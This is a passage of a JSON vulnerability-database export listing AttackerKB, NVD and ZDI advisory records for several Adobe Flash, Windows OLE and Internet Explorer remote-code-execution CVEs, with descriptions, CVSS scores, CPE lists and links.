{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2015-12-28T00:00:00", "type": "attackerkb", "title": "CVE-2015-8651", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2021-07-27T00:00:00", "id": "AKB:1A8767F3-3BC8-4407-A9FD-DC2CFB0C9C54", "href": "https://attackerkb.com/topics/JLs1HvRokE/cve-2015-8651", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T23:37:58", "description": "OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka \u201cWindows OLE Automation Array Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2014-11-11T00:00:00", "type": "attackerkb", "title": "CVE-2014-6332", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2020-07-30T00:00:00", "id": "AKB:6CBD1561-C951-43AA-B986-08CDDABA48A6", "href": "https://attackerkb.com/topics/Od7MF9dsaM/cve-2014-6332", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T02:33:17", "description": "JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \u201cJScript9 Memory Corruption Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2015-2419", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2020-06-05T00:00:00", "id": "AKB:EE437A8A-C572-480C-AAFD-F336171F4417", "href": "https://attackerkb.com/topics/P1XXD2L59b/cve-2015-2419", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T01:57:58", "description": "The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \u201cScripting Engine Memory Corruption Vulnerability,\u201d a different vulnerability than CVE-2016-0187.\n\n \n**Recent 
assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2016-0189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189"], "modified": "2020-07-30T00:00:00", "id": "AKB:193928A5-C34B-443B-8866-B66D2F427449", "href": "https://attackerkb.com/topics/obKyofAUsj/cve-2016-0189", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:27:49", "description": "The Microsoft (1) JScript 5.8 and (2) VBScript 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \u201cScripting Engine Memory Corruption Vulnerability,\u201d a different vulnerability than CVE-2016-0189.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2016-0187", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189"], "modified": "2020-06-05T00:00:00", "id": "AKB:39C1A10D-3FB1-476C-8129-7973A0AF496F", "href": "https://attackerkb.com/topics/bYNGQFvYHy/cve-2016-0187", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T05:32:53", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka \u201cInternet Explorer Use After Free Vulnerability,\u201d a different vulnerability than CVE-2013-1308 and CVE-2013-1309.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2013-2551", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2020-07-30T00:00:00", "id": "AKB:003E78EC-23F3-48D2-9FF8-08F9B852C832", "href": "https://attackerkb.com/topics/YgZh47jMGw/cve-2013-2551", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:27:48", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka \u201cInternet Explorer Use After Free Vulnerability,\u201d a different vulnerability than CVE-2013-1309 and CVE-2013-2551.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-05-15T00:00:00", "type": "attackerkb", "title": "CVE-2013-1308", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2020-06-05T00:00:00", "id": "AKB:642B30B9-AAA1-4CE3-BB5D-13D329B72BC3", "href": "https://attackerkb.com/topics/KFy1PfsJO3/cve-2013-1308", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:25:24", "description": "Integer overflow in Adobe Flash Player before 18.0.0.324 and 19.x and 20.x before 20.0.0.267 on Windows and OS X and before 11.2.202.559 on Linux, Adobe AIR before 20.0.0.233, Adobe AIR SDK before 20.0.0.233, and Adobe AIR SDK & Compiler before 20.0.0.233 allows attackers to execute arbitrary code via unspecified vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2015-12-28T23:59:00", "type": "cve", "title": "CVE-2015-8651", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2017-02-17T02:59:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:air_sdk:20.0.0.204", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:air_sdk_\\&_compiler:20.0.0.204", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:flash_player:18.0.0.268", "cpe:/a:adobe:air:20.0.0.204", "cpe:/a:adobe:flash_player:11.2.202.554"], "id": 
"CVE-2015-8651", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8651", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.554:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.204:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:20.0.0.204:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.204:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.268:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:09:08", "description": "OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka \"Windows OLE Automation Array Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2014-11-11T22:55:00", "type": "cve", "title": "CVE-2014-6332", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2014-6332"], "modified": "2019-05-15T13:30:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2014-6332", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:13:15", "description": "JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"JScript9 Memory Corruption Vulnerability.\"", "cvss3": {}, "published": "2015-07-14T21:59:00", "type": "cve", "title": "CVE-2015-2419", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2018-10-12T22:09:00", "cpe": ["cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11"], "id": "CVE-2015-2419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2419", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:11:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:47:24", "description": "The Microsoft (1) JScript 5.8 and (2) VBScript 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-0189.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-11T01:59:00", "type": "cve", "title": "CVE-2016-0187", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189"], "modified": "2018-10-12T22:11:00", "cpe": ["cpe:/a:microsoft:vbscript:5.8", "cpe:/a:microsoft:jscript:5.8"], "id": "CVE-2016-0187", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0187", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:jscript:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:vbscript:5.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:47:26", "description": "The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-0187.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-11T01:59:00", "type": "cve", "title": "CVE-2016-0189", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0187", 
"CVE-2016-0189"], "modified": "2018-10-12T22:11:00", "cpe": ["cpe:/a:microsoft:vbscript:5.8", "cpe:/a:microsoft:jscript:5.8", "cpe:/a:microsoft:vbscript:5.7"], "id": "CVE-2016-0189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0189", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:vbscript:5.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:jscript:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:vbscript:5.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:12:11", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka \"Internet Explorer Use After Free Vulnerability,\" a different vulnerability than CVE-2013-1309 and CVE-2013-2551.", "cvss3": {}, "published": "2013-05-15T03:36:00", "type": "cve", "title": "CVE-2013-1308", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2018-10-12T22:04:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7"], "id": "CVE-2013-1308", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1308", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:12:11", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka \"Internet Explorer Use After Free Vulnerability,\" a different vulnerability than CVE-2013-1308 and CVE-2013-2551.", "cvss3": {}, "published": "2013-05-15T03:36:00", "type": "cve", "title": "CVE-2013-1309", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2018-10-12T22:04:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7"], "id": "CVE-2013-1309", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1309", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*"]}, {"lastseen": 
"2022-03-23T12:36:10", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka \"Internet Explorer Use After Free Vulnerability,\" a different vulnerability than CVE-2013-1308 and CVE-2013-1309.", "cvss3": {}, "published": "2013-03-11T10:55:00", "type": "cve", "title": "CVE-2013-2551", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2018-10-12T22:04:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7"], "id": "CVE-2013-2551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2551", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2022-01-31T21:02:52", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. 
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of VML data. The issue lies in the handling of an array when defined as an attribute of a subelement of a shape. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2013-05-29T00:00:00", "type": "zdi", "title": "(Pwn2Own) Microsoft Internet Explorer VML Parsing Remote Code Execution Vulnerabillity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2020-04-14T00:00:00", "id": "ZDI-13-102", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-102/", "cvss": {"score": 9.3, "vector": 